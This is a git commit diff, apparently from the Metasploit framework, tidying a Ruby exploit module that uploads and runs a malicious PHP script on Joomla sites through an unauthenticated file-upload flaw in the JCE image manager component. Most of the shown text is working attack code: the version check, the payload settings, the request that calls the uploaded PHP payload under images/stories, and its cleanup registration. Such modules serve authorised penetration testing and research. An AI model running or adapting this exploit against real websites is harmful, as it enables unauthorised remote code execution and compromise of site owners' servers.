cleanup for joomla_comjce_imgmanager

unstable
jvazquez-r7 2013-03-26 12:02:39 +01:00
parent 9b3bbd577f
commit 1d95abc458
1 changed files with 28 additions and 28 deletions

View File

@ -15,32 +15,33 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla Component JCE File Upload Code Execution',
'Name' => 'Joomla Component JCE File Upload Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the JCE component for Joomla!
could allow a unauthenticated remote attacker to upload arbitrary files,
caused by the fails to sufficiently sanitize user-supplied input.
Sending a specially-crafted HTTP request, a remote attacker could exploit
this vulnerability to upload a malicious PHP script, which could allow the
attacker to execute arbitrary PHP code on the vulnerable system.
This module exploits a vulnerability in the JCE component for Joomla!, which
could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
request, a remote attacker could exploit this vulnerability to upload a malicious PHP
script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
1.5.26.
},
'Author' => [ 'Heyder Andrade <eu[at]heyderandrade.org>' ],
'Author' =>
[
'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '49338'],
['EDB', '17734'],
['EDB', '17734']
],
'Payload' =>
{
'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
'DisableNops' => true,
'BadChars' => "#",
'Keys' => ['php'],
'Compat' =>
{
'ConnectionType' => 'find',
},
'Keys' => ['php']
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
@ -66,15 +67,14 @@ class Metasploit3 < Msf::Exploit::Remote
'file' => 'imgmanager'
}
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi(
{
res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'GET',
'version' => '1.1'
})
version = nil
if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
version = $1.nil? ? nil : $1
@ -171,7 +171,6 @@ class Metasploit3 < Msf::Exploit::Remote
payload = "#{@payload_name}.php"
print_status("Calling payload: #{payload}")
uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
register_files_for_cleanup(payload)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
@ -186,6 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote
return if not check == Exploit::CheckCode::Vulnerable
if upload_gif == :success
if renamed?
register_files_for_cleanup("#{@payload_name}.php")
call_payload
end
end